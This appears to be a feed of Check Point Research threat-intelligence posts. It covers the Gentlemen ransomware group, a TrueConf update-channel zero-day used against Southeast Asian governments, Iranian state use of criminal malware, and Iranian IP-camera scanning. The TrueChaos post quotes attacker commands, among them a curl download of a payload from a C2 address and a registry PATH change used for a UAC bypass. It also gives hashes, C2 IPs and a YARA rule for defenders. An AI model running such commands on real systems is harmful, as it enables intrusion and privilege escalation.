The Gentlemen RaaS program has quickly evolved into a highly active and structured ransomware ecosystem. With over 320 public victims in 2026 and hundreds more systems visible through related infrastructure, it stands among the most productive RaaS operations that maintain a public data‑leak presence. The leaked Rocket backend and internal chats show that this scale is driven not by a loose crowd, but by a small, tightly coordinated core of about 9 named operators and at least 8 distinct affiliate TOX IDs, all organized around the administrator zeta88 / hastalamuerte, who both runs the platform and participates directly in operations.

The leak reveals a repeatable, human‑operated ransomware playbook: initial access through exposed edge infrastructure (such as VPNs and management interfaces), rapid expansion and privilege escalation, heavy investment in EDR/AV evasion and ETW/logging tampering, and systematic use of shared tools for discovery, lateral movement, credential theft, and data exfiltration. The group actively tracks and evaluates modern vulnerabilities, including CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073and combines them with technique‑driven paths like backup and management‑controller abuse and NTLM relay workflows, giving them a flexible exploitation pipeline.

Overall, The Gentlemen exemplifies how contemporary RaaS programs blend productized ransomware with professional intrusion teams. A small, well‑organized set of operators, supported by curated tooling, structured communication channels, and up‑to‑date exploit knowledge, can generate substantial impact in a short time. For defenders, this underscores the need to harden internet‑facing services, close known misconfigurations and relay paths, and monitor for the specific tools, workflows, and TOX‑based communication patterns tied to this group.


Indicators of Compromise

DescriptionValue
The Gentlemen Windows025fc0976c548fb5a880c83ea3eb21a5f23c5d53c4e51e862bb893c11adf712a
1334f0189a8e6dbc48456fa4b482c5726ab7609f7fa652fcc4c1a96f2334436f
1af419b36a5edefef387409e2b3248c9223f7dc49a4f7b15ea095d371c3a70b2
22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67
24ac3588fb8cfbff63b7fdfcbc7dec1f3c60e54e6f949dd69d68e89e0c89d966
2ed9494e9b7b68415b4eb151c922c82c0191294d0aa443dd2cb5133e6bfe3d5d
3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235
3c2182cb0bc7528829ef03f1b1745a92bcc47d917eb8870862488f21fdf1a6d6
48d9b2ce4fcd6854a3164ce395d7140014e0b58b77680623f3e4ca22d3a6e7fd
4a175eed927c0a477eafb8aa35a93c191748acaa78ac7aecd8ea3c4cd868887c
51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2
62c2c24937d67fdeb43f2c9690ab10e8bb90713af46945048db9a94a465ffcb8
6a3ab9e984a759d55af4e84487d1fc44683065cc9a1089d5aa4ad1c0e4e84a63
860a6177b055a2f5aa61470d17ec3c69da24f1cdf0a782237055cba431158923
87d25d0e5880b3b5cd30106853cbfc6ef1ad38966b30d9bd5b99df46098e546c
8aa0cb69ca2777001e0f4ba0eaab0841592710e4cc5ccd6b0b526d78bbd8bfba
8c87134c1b45e990e9568f0a3899b0076f94be16d3c40fa824ac1e6c6ee892db
91415e0b9fe4e7cbe43ec0558a7adf89423de30d22b00b985c2e4b97e75076b1
994d6d1edb57f945f4284cc0163ec998861c7496d85f6d45c08657c9727186e3
9f61ff4deb8afced8b1ecdc8787a134c63bde632b18293fbfc94a91749e3e454
a7a19cab7aab606f833fa8225bc94ec9570a6666660b02cc41a63fe39ea8b0ad
b67958afc982cafbe1c3f114b444d7f4c91a88a3e7a86f89ab8795ac2110d1e6
c46b5a18ab3fb5fd1c5c8288a41c75bf0170c10b5e829af89370a12c86dd10f8
c7f7b5a6e7d93221344e6368c7ab4abf93e162f7567e1a7bcb8786cb8a183a73
dce2e5cc00eff2493f8ced546dc51f9d5ef78c5ee56805906ec642dfa77a1c70
dfe696ff713318c53fb17731bd4a6585a02c085b590149b19847990b324a0be6
ec368ae0b4369b6ef0da244774995c819c63cffb7fd2132379963b9c1640ccd2
efaf8e7422ffd09c7f03f1a5b4e5c2cc32b05334c18d1ccb9673667f8f43108f
f736be55193c77af346dbe905e25f6a1dee3ec1aedca8989ad2088e4f6576b12
fc75ed2159e0c8274076e46a37671cfb8d677af9f586224da1713df89490a958
The Gentlemen Linux1eece1e1ba4b96e6c784729f0608ad2939cfb67bc4236dfababbe1d09268960c
5dc607c8990841139768884b1b43e1403496d5a458788a1937be139594f01dca
788ba200f776a188c248d6c2029f00b5d34be45d4444f7cb89ffe838c39b8b19


Yara Rule

rule thegentlemen_ransomware
{
    meta:
        author = "@Tera0017/Check Point Research"
        description = "The Gentlemen Ransomware written in GO."
    strings:
        $string1 = "Silent mode (don't rename files)" ascii
        $string2 = "Encrypt only mapped and UNC network shares" ascii
        $string3 = "README-GENTLEMEN.txt" ascii
        $string4 = "gentlemen.bmp" ascii
        $string5 = "gentlemen_system" ascii
        $string6 = "[+] Encryption started. Going background..." ascii
        $string7 = "[+] FULL Encryption started" ascii
    condition:
        uint16(0) == 0x5A4D and 4 of them
}

The post Thus Spoke…The Gentlemen appeared first on Check Point Research.

Received — 23 April 2026 Check Point Research

Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets

31 March 2026 at 15:16

Key Points

  • Check Point Research identified a zero-day vulnerability in the TrueConf client application, tracked as CVE-2026-3502, with a CVSS score of 7.8. The flaw stems from the abuse of TrueConf’s updater validation mechanism, allowing an attacker who controls the on-premises TrueConf server to distribute and execute arbitrary files across all connected endpoints.
  • This vulnerability has been exploited in-the-wild as part of a targeted campaign we call “TrueChaos” against government entities in Southeast Asia, where the threat actor abused the TrueConf update mechanism to deploy the Havoc payload to vulnerable machines.
  • Based on the observed TTPs, command and control infrastructure and victimology, we assess with moderate confidence that this activity is associated with a Chinese-nexus threat actor.
  • Check Point Research responsibly disclosed this vulnerability to TrueConf. Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was released in March 2026. The current version of the desktop apps is 8.5.2.

Introduction

At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment. The investigation led to the discovery of a zero-day vulnerability in the TrueConf client, tracked as CVE-2026-3502 with a CVSS score of 7.8. The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints.

TrueConf is a video conferencing platform that supports both on-premises and cloud deployments and is used across multiple regions, most prominently in Russia, as well as in East Asia, Europe, and the Americas. Serving more than 100,000 organisations globally, their global customers range from key governments and defense departments and critical infrastructure industries to significant businesses such as banks, power and TV stations. In enterprise environments, its on-premises architecture creates a trusted relationship between the central server and connected clients, especially through the platform’s update mechanism.

Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection. It is primarily used by government, military, and critical infrastructure sectors to ensure absolute data privacy and communication autonomy in secure or remote environments. In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems.

In this particular case, that trust was abused to deliver malware due to improper validation in the update process. In the observed in-the-wild activity, operation “TrueChaos”, the threat actor used the trusted update channel of a centrally managed on-premises TrueConf server to distribute malicious updates to multiple connected government agencies in a South Eastern country.

The victimology and regional focus of the campaign suggest an espionage-motivated operation. In combination with the observed TTPs and command-and-control infrastructure, these indicators point with moderate confidence to a Chinese-nexus threat actor.

About TrueConf

TrueConf is a video conferencing platform that supports both on-premises and cloud deployments. Although it is most widely used in Russia, it also has a notable presence across parts of East Asia, Europe, and the Americas. To better understand the potential scope of the vulnerability, we reviewed internet exposed TrueConf servers to assess the platform’s geographic distribution and the possible reach of the attack. This view is necessarily incomplete, as many TrueConf deployments may operate entirely in on-premises environments and remain inaccessible from the public internet.

Figure 1 – Geographic Distribution of Internet-Exposed TrueConf Servers

CVE-2026-3502 Root Cause Analysis

When the TrueConf client starts, it checks the connected on-premises server for available updates. If the server has a newer client version than the one installed, the application prompts the user to download the update from https://{trueconf_server}/downlods/trueconf_client.exe, which maps to the file stored on the server under C:\Program Files\TrueConf Server\ClientInstFiles\.

Figure 2 – TrueConf Application Update Prompt

TrueConf client update starts when the client detects a version mismatch in favor of the TrueConf on-premises server, the client alerts the user that a newer version is available and offers to download it.

Figure 3 – Updating TrueConf Client Without Reinstalling The Server https://trueconf.com/docs/server/en/admin/info/

The vulnerability stems from the lack of integrity and authenticity checks in this update flow. An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients. Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update.

Figure 4 – TrueConf Client’s Settings Page https://trueconf.com/docs/server/en/admin/info/

In-The-Wild Exploitation

The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.

Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process.

The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update.

Analysis of the downloaded package showed that it was a weaponized client update. The installation was built by Inno Setup. It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2. Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso\, which was then loaded through DLL side-loading.

Figure 5 – Malicious Client Update Attack Chain

Using the malicious 7z-x64.dll implant, the attacker performed a series of hands-on-keyboard actions focused on reconnaissance, environment preparation, persistence, and the retrieval of additional payloads.

Figure 6 - Attacker Hands-on-Keyboard Activity
Figure 6 – Attacker Hands-on-Keyboard Activity
  • Initial reconnaissance included commands such as:
    • tasklist > cache
    • tracert 8.8.8.8 -h 5
  • Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory:
    • curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p <redacted>
  • The attacker then modified the current user’s PATH variable, in order to preform UAC bypass by using the Microsoft iSCSI Initiator Control Panel tool:
    • reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<redacted>\appdata\local\temp" /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe

iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll. By placing a malicious iscsiexe.dll in a user-controlled location referenced through the user’s %PATH%, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe, resulting in privilege escalation without a UAC prompt.

The downloaded update.7z archive contained a legitimate 7z.exe binary alongside iscsiexe.dll, a component used by the attackers as part of the post-compromise workflow. Check Point Research also identified additional variants of the archive that included an encrypted 7z archive named rom.dat. At the time of analysis, the contents and purpose of rom.dat remained unclear.

The iscsiexe.dll component appears to be a simple, custom persistence and privilege escalation tool. Rather than serving as a full-featured backdoor, its role was limited to maintaining execution of winexec.exe, which is the renamed poweriso.exe binary dropped earlier in the infection chain.

Figure 7 - Pseudo-Code of iscsiexe.dll
Figure 7 – Pseudo-Code of iscsiexe.dll

Although Check Point Research did not recover the exact final-stage payload associated with the malicious 7z-x64.dll activity, it observed network communication to 47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure, and also identified Havoc demon sample linked to actor C2 infrastructure. Based on this combined evidence, Check Point Research assesses with high confidence that the missing payload was a Havoc implant.

Havoc is an open-source post-exploitation framework intended for penetration testing and adversary emulation, but it has also been repeatedly abused by threat actors in real-world intrusions, including Chinese-nexus Amaranth Dragon activity recently documented by Check Point Research.

Attribution

Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor. The assessment is based on a combination of factors, including TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure and the victimology aligns with Chinese nexus strategic interests.

We also observed that the same victim was targeted within the same time frame by ShadowPad malware framework. This may indicate overlap in operator tooling, shared access, or the presence of multiple China-aligned actors targeting the same organization in parallel.

Conclusion

The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually. Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks.

From a research perspective, this case shows how monitoring and analysing routine execution techniques can uncover far more significant threats. What initially appeared to be a signed binary used for DLL sideloading ultimately led to the discovery of a zero-day vulnerability in TrueConf’s update validation mechanism.

Hunting Recommendations

In order to identify whether you have been compromised, review the following indicators and hunting opportunities across the affected system: 

  • Check whether trueconf_windows_update.exe is unsigned, as an unsigned update executable may indicate that the file is suspicious or has been tampered with.
  • Treat the system as potentially infected if C:\ProgramData\PowerISO\poweriso.exe is present on disk, especially if this file is not expected in your environment.
  • Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe, as this indicates persistence through a user logon autorun entry.
  • Treat the system as potentially infected if files such as %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, or rom.dat are present, or if there is evidence that they were recently created and then deleted.
  • Hunt for file creation activity in which trueconf_windows_update.tmp creates C:\ProgramData\PowerISO\poweriso.exe or 7z-x64.dll, as this behavior is consistent with the observed delivery chain.
  • Hunt for poweriso.exe spawning commands through cmd.exe, particularly when the command line includes tools or utilities such as curl, winrar.exe, or netstat, since this may indicate download, extraction, or discovery activity.
  • Hunt for the suspicious parent-child process chain trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp -> any executable, as this sequence may reveal execution of the malicious payload.

Indicators of Compromise

trueconf_windows_update.exe – Malicious TrueConf client update
22e32bcf113326e366ac480b077067cf

iscsiexe.dll – Loader
9b435ad985b733b64a6d5f39080f4ae0

7z-x64.dll – Havoc implant
248a4d7d4c48478dcbeade8f7dba80b3

43.134.90[.]60 – Havoc C2
43.134.52[.]221 – Havoc C2
47.237.15[.]197 – Havoc C2

The post Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets appeared first on Check Point Research.

Received — 12 March 2026 Check Point Research

Iranian MOIS Actors & the Cyber Crime Connection

10 March 2026 at 17:54

Key Points

  • Iran-linked actors are increasingly engaging with the cyber crime ecosystem. Their activity suggests a growing reliance on criminal tools, services, and operational models in support of state objectives.
  • Iranian actors have long used cyber crime and hacktivism as cover for destructive activity, but the trend now suggests direct engagement with the criminal ecosystem.
  • This dynamic appears most prominently among Ministry of Intelligence and Security (MOIS)-linked actors, particularly Void Manticore (a.k.a “Handala Hack”) and MuddyWater, where repeated overlaps with criminal tools, services, or clusters have been observed.
  • Such engagement offers a dual advantage: it enhances operational capabilities through access to mature criminal tooling and resilient infrastructure, while complicating attribution and contributing to recurring confusion around Iranian threat activity.

Introduction

For years, Iranian intelligence services have operated through deniable criminal intermediaries in the physical world. A similar pattern is now becoming visible in cyber space, where state objectives are increasingly pursued through criminal tools, services, and operational models. Notably, this dynamic appears with growing frequency in activity associated with actors linked to the Ministry of Intelligence and Security (MOIS).

For a long time, Iranian actors sought to mask state activity behind the appearance of ordinary cyber crime, most often by posing as ransomware operators. The trend we are seeing now goes beyond imitation. Rather than simply adopting criminal and hacktivist personas to complicate attribution, some Iranian actors appear to be associating with the cyber criminal ecosystem itself, leveraging its malware, infrastructure, and affiliate-style mechanisms. This shift matters because it does more than improve deniability; it can also expand operational reach and enhance technical capability.

In this blog, we examine several cases that reflect this evolution, including Iranian-linked use of ransomware branding, commercial infostealers, and overlaps with criminal malware clusters. Taken together, these examples suggest that for some MOIS-associated actors, cyber crime is no longer just a cover story, but an operational resource.

Background – MOIS and Criminal Activity

Long before concern shifted to the digital arena, some of the clearest signs of cooperation between Iran’s intelligence services and criminal actors appeared in plots involving surveillance, kidnappings, shootings, and assassination attempts. In those cases, the value of criminal networks was straightforward: they gave Tehran reach, deniability, and access to people willing to carry out violence at arm’s length.

According to the U.S. Treasury, one of the clearest examples involved the network led by narcotics trafficker Naji Ibrahim Sharifi-Zindashti, which Treasury said operated at the behest of MOIS and targeted dissidents and opposition activists. The FBI has similarly said that an MOIS directorate operated the Zindashti criminal network and its associates against Iranian dissidents in the United States.

Sweden has described a similar pattern. According to Sweden’s Security Service, the Iranian regime has used criminal networks in Sweden to carry out violent acts against states, groups, and individuals it sees as threats; Swedish officials later linked that concern to attacks aimed at Israeli and Jewish targets, including incidents near Israel’s embassy in Stockholm.

Recent activity we have analyzed and associate with MOIS-affiliated cyber actors suggests that the same logic is now being applied in the cyber domain. The emphasis is not only on imitating cyber criminal behavior, but on associating with the cyber criminal ecosystem itself: drawing on its infrastructure, access brokers, marketplaces, and affiliate-style relationships.

Void Manticore (Handala) and Rhadamanthys

Void Manticore, an Iranian threat actor linked to several hack-and-leak personas, is one of the most active groups pursuing strategic objectives through cyber operations. It has leveraged “hacktivistic” personas such as Homeland Justice in attacks against Albania and Handala in operations targeting Israel. While the group is most commonly associated with “hack and leak” operations and disruptive attacks, particularly wiper operations, the emergence of its Handala persona also revealed the use of a commercial infostealer sold on darknet forums: Rhadamanthys.

Figure 1 - A Handala email impersonating the Israeli National Cyber Directorate (INCD) delivering Rhadmanthys.
Figure 1 – A Handala email impersonating the Israeli National Cyber Directorate (INCD) delivering Rhadmanthys.

Rhadamanthys is a widely used infostealer employed by a range of threat actors, including both financially motivated groups and state-sponsored operators. It has built a strong reputation due to its complex architecture, active development, and frequent updates. Handala used Rhadamanthys on several occasions, pairing it with one of its custom wipers in phishing lures aimed at Israeli targets, most dominantly impersonating F5 updates.

MuddyWater – Tsundere Botnet and the Castle Loader Connection

MuddyWater, a threat actor that U.S. authorities have linked to Iran’s MOIS, has conducted cyber espionage and other malicious operations focused on the Middle East for years. According to CISA, MuddyWater is a subordinate element within MOIS and has carried out broad campaigns in support of Iranian intelligence objectives, targeting government and private-sector organizations across sectors including telecommunications, defense, and energy.

Recent reports detailing the activity of MuddyWater link its operations to several cyber crime clusters of activity. This appears to work in the actors’ favor: the use of such tools has created significant confusion, leading to misattribution and flawed pivoting, and clustering together activities that are not necessarily related. This demonstrates that the use of criminal software can be effective for obfuscation, and highlights the need for extreme caution when analyzing overlapping clusters.

Figure 2 - Summary of MuddyWater connections to criminal activity.
Figure 2 – Summary of MuddyWater connections to criminal activity.

To address this, we attempted to bring structure to the available evidence, to the best of our ability, and identify which activity is truly associated with MuddyWater.

Tsundere Botnet (a.k.a DinDoor)

The Tsundere Botnet was first uncovered in late 2025 and was later linked to MuddyWater. Large parts of its activity rely on Node.js and JavaScript scripts to execute code on compromised machines. In several instances observed in the wild, when the Node.js engine is detected, the botnet shifts to an alternative execution method using Deno, a runtime for JavaScript and TypeScript. Since Deno-based execution had not previously been associated with Tsundere, researchers linking this activity to MuddyWater designated this variant as DinDoor.

Given that two separate sources linked Tsundere to MuddyWater, one via a VPS and the other through vendor telemetry, it is likely that MuddyWater uses the botnet as part of its operations. Another overlap between DinDoor-related activity and known MuddyWater tradecraft is the use of rclone to access a Wasabi server, which traces back to an IP address previously associated with MuddyWater (18.223.24[.]218, linked to eb5e96e05129e5691f9677be4e396c88).

Castle Loader Connection (a.k.a FakeSet)

Another malware family recently linked to MuddyWater is FakeSet, which, according to our analysis, is a downloader used in recent infection chains delivering CastleLoader. CastleLoader operates as a Malware-as-a-Service offering used by multiple affiliates. Based on our understanding, the reported link between CastleLoader and MuddyWater stems from the use of a set of code-signing certificates, specifically under the Common Names “Amy Cherne” and “Donald Gay”. Certificates with these common names were also used to sign MuddyWater malware (“StageComp”), Tsundere Deno malware (“DinDoor”), and CastleLoader (“FakeSet”) variants.

In our assessment, this does not necessarily indicate that MuddyWater is a CastleLoader affiliate; rather, it suggests that both may have obtained certificates from the same source.

Iranian Qilin Affiliates

In October 2025, Israeli Shamir Medical Center was hit by a major cyber attack that was initially described as a ransomware incident. The attackers claimed to have stolen a large amount of data and demanded a ransom in exchange for not publishing it. Israeli officials said the attack did not affect hospital operations and patient care was not significantly disrupted. Still, some information appears to have been leaked, including limited email correspondence and certain medical data.

Figure 3 - Shamir Medical Center on Qilin Leak Site
Figure 3 – Shamir Medical Center on Qilin Leak Site

At first, the attack was presented as a ransomware incident linked to the Qilin group, but later Israeli assessments pointed much more directly to Iranian actors as the real force behind it. Qilin is known as a ransomware-as-a-service (RaaS) operation, meaning it provides ransomware infrastructure and tooling to outside partners or “affiliates” who actually carry out intrusions. In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators working through the cyber criminal ecosystem, using a criminal ransomware brand and methods associated with the broader extortion market, while serving a strategic Iranian objective.

This attack did not occur in isolation. It appears to be part of a broader, sustained campaign by MOIS and Hezbollah to target Israeli hospitals, a pattern that has been evident since late 2023. The use of Qilin, and participation in its affiliate program, likely serves not only as a layer of cover and plausible deniability, but also as a meaningful operational enabler, especially as earlier attacks appear to have heightened security measures and monitoring by Israeli authorities.

Conclusion

The cases examined in this blog show that, for some Iranian actors, cyber crime is no longer just a cover for state-directed activity. Across these examples, the pattern is not limited to the appearance of criminal behavior, but includes the use of criminal malware, ransomware branding, and affiliate-style ecosystems in support of strategic objectives. This reflects a clear shift from simply imitating cyber criminals to actively leveraging the cyber crime ecosystem.

This shift matters because it delivers clear operational benefits. For MOIS-linked actors in particular, engagement with criminal tools and services enhances capabilities while complicating attribution and fueling confusion around Iranian activity. Taken together, the cases discussed here show that cyber crime has become not just camouflage, but a practical operational resource.

Indicators of Compromise

Handala Rhadmanthys Variants

aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f

Malware samples signed with suspicious certificates

sha256 Certificate Common Name Certificate Thumbprint Certificate Serial Number Malware Family
077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de Amy Cherne 0902d7915a19975817ec1ccb0f2f6714aed19638 330007f1068f41bf0f662a03b500000007f106 FakeSet / CastleLoader
ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 Amy Cherne 0902d7915a19975817ec1ccb0f2f6714aed19638 330007f1068f41bf0f662a03b500000007f106 FakeSet / CastleLoader
2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 Amy Cherne 2087bb914327e937ea6e77fe6c832576338c2af8 330006df515a14fe3748416fe200000006df51 FakeSet / CastleLoader
64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 Amy Cherne 21a435ecaa7b86efbec7f6fb61fcda3da686125c 330006e75231f49437ae56778a00000006e752 FakeSet / CastleLoader
74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d Amy Cherne 389b12da259a23fa4559eb1d97198120f2a722fe 330007d5443a7d25208ec5feb100000007d544 FakeSet / CastleLoader
94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 Amy Cherne 389b12da259a23fa4559eb1d97198120f2a722fe 330007d5443a7d25208ec5feb100000007d544 FakeSet / CastleLoader
4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be Amy Cherne 579a4584a6eef0a2453841453221d0fb25c08c89 33000700e919066fd9db11bac70000000700e9 FakeSet / CastleLoader
a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 Amy Cherne d920ae0f8ea8b5bd42de49e01c6bbd4c2c6d0847 330007ebfbe75a64b52aaf4cb700000007ebfb FakeSet / CastleLoader
64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb Donald Gay f8444dfc740b94227ab9b2e757b8f8f1fa49362a 3300072b29c3bf8403a6c15be2000000072b29 FakeSet / CastleLoader
a8c380b57cb7c381ca6ba845bd7af7333f52ee4dc4e935e98b48bb81facad72b Donald Gay 9dcb994ea2b8e6169b76a524fae7b2d2dcd1807d 33000725fea86dd19e8571b26c0000000725fe FakeSet / CastleLoader
24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 Donald Gay b674578d4bdb24cd58bf2dc884eaa658b7aa250c 3300079a51c7063e66053d229b000000079a51 StageComp
a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 Donald Gay b674578d4bdb24cd58bf2dc884eaa658b7aa250c 3300079a51c7063e66053d229b000000079a51 StageComp
2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 Amy Cherne 551bdf646df8e9abe04483882650a8ffae43cb55 330006e15e43401dbd9416e20e00000006e15e DinDoor / Tsundere Deno

The post Iranian MOIS Actors & the Cyber Crime Connection appeared first on Check Point Research.

Interplay between Iranian Targeting of IP Cameras and Physical Warfare in the Middle East

4 March 2026 at 04:16

Key Findings

  • During the ongoing conflict, we identified intensified targeting of IP cameras from two manufacturers starting on February 28, originating from infrastructure we attribute to Iranian threat actors.
  • The targeting extends across Israel, Qatar, Bahrain, Kuwait, the UAE, and Cyprus – countries that have also experienced significant missile activity linked to Iran. On March 1st, we additionally observed camera-targeting activity focused on specific areas in Lebanon.
  • We also observed earlier, more targeted activity against cameras in Israel and Qatar on January 14–15. These dates surround with Iran’s temporary closure of its airspace, reportedly amid expectations of a potential U.S. strike.
  • Taken together, these findings are consistent with the assessment that Iran, as part of its doctrine, leverages camera compromise for operational support and ongoing battle damage assessment (BDA) for missile operations, potentially in some cases prior to missile launches. As a result, tracking camera-targeting activity from specific, attributed infrastructures may serve as an early indicator of potential follow-on kinetic activity.

Introduction

As highlighted in the Cyber Security Report 2026, cyber operations have increasingly become an additional tool in interstate conflicts, used both to support military operations and to enable ongoing battle damage assessment (BDA). During the 12-day conflict between Israel and Iran in June 2025, the compromise of cameras was likely used to support BDA and/or target-correction efforts.

In the current Middle East conflict, Check Point Research has observed intensified targeting of cameras beginning in the first hours of hostilities, including a sharp increase in exploitation attempts against IP cameras not only in Israel but also across Gulf countries: specifically the UAE, Qatar, Bahrain, and Kuwait, as well as similar activity in Lebanon and Cyprus. This activity originated from multiple attack infrastructures that we attribute to several Iran-nexus threat actors.

Notably, we also identified earlier activity exhibiting similar patterns, dated January 14, coinciding with the peak of anti-regime protests in Iran, a period during which Iran anticipated potential action from the United States and Israel and temporarily closed its airspace.

Findings

Check Point Research (CPR) continuously tracks infrastructure used by Iran-nexus threat actors.

Starting February 28, we observed a spike in targeting of IP cameras in several countries in the Middle East including Israel, UAE, Qatar, Bahrain, Kuwait and Lebanon, while also similar activity occurred against Cyprus.

The attack infrastructure we track combines specific commercial VPN exit nodes (Mullvad, ProtonVPN, Surfshark, NordVPN) and virtual private servers (VPS), and is assessed to be employed by multiple Iran-nexus actors.

Scanning activity we observed targets cameras such as Hikvision and Dahua and aligns with attempts to identify exposure to the vulnerabilities listed below. No attempts to interact with other camera vendors were observed from this infrastructure.

The popular devices of Hikvision and Dahua are targeted with the following vulnerabilities:

CVEVulnerability
CVE-2017-7921An improper authentication vulnerability in Hikvision IP camera firmware
CVE-2021-36260A command injection vulnerability in the Hikvision web server component
CVE-2023-6895An OS command injection vulnerability in Hikvision Intercom Broadcasting System
CVE-2025-34067An unauthenticated remote code execution vulnerability in Hikvision Integrated Security Management Platform
CVE-2021-33044An authentication bypass vulnerability in multiple Dahua products

Patches are available for all of the vulnerabilities listed above.

As a case study, we conducted a deep dive into two of the CVEs listed above – CVE-2021-33044 and CVE-2017-7921 – and examined exploitation attempts originating from operational infrastructure we attribute to Iran, observed since the beginning of the year.

Waves of activity against Israel:

The spikes in this activity are closely aligned with geopolitical events around the same time:

  • January 14-15 – While internal anti-regime protests in Iran peaked, Iranian officials and state media portrayed the unrest as a foreign-backed plot by Iran’s adversaries, including the United States and Israel and also closed its airspace. At the same time we also observe a wave of scans of cameras in the Iraqi Kurdistan.
  • January 24 – The U.S. Central Command (CENTCOM) commander visited Israel and met with the Israel Defense Forces’ chief of staff amid heightened tensions.
  • Beginning of February – Iran’s leadership was increasingly worried about a possible U.S. strike; Iranian/IRGC-linked messaging warned a strike could trigger a wider regional war.

Waves of activity against Qatar:

Waves of activity against Bahrain:

Waves of activity against Kuwait:

Waves of activity against United Arab Emirates:

Waves of activity against Cyprus:

Waves of activity against Lebanon:

We observed similar targeting patterns during the 12-day war between Israel and Iran in June 2025, likely to support battle damage assessment (BDA) and/or targeting correction. One of the best-known cases occurred when Iran struck Israel’s Weizmann Institute of Science with a ballistic missile and had reportedly taken control of a street camera facing the building just prior to the hit

Recommendations for Defenders:

  • Eliminate public exposure: remove direct WAN access to cameras/NVRs; place them behind VPN or a zero-trust access gateway; block inbound port-forwards.
  • Enforce strong credentials: change default passwords, enforce unique credentials.
  • Patch management: keep cameras/NVR firmware and management software updated – updates from the manufacturers are available; remove/replace end-of-life devices that no longer get security fixes.
  • Network segmentation: isolate cameras on a dedicated VLAN with no lateral access to corporate/OT networks; tightly control outbound traffic (only to required update/cloud endpoints).
  • Monitoring & detection: repeated login failures, unexpected remote logins; cameras initiating unusual outbound connections.

The post Interplay between Iranian Targeting of IP Cameras and Physical Warfare in the Middle East appeared first on Check Point Research.

❌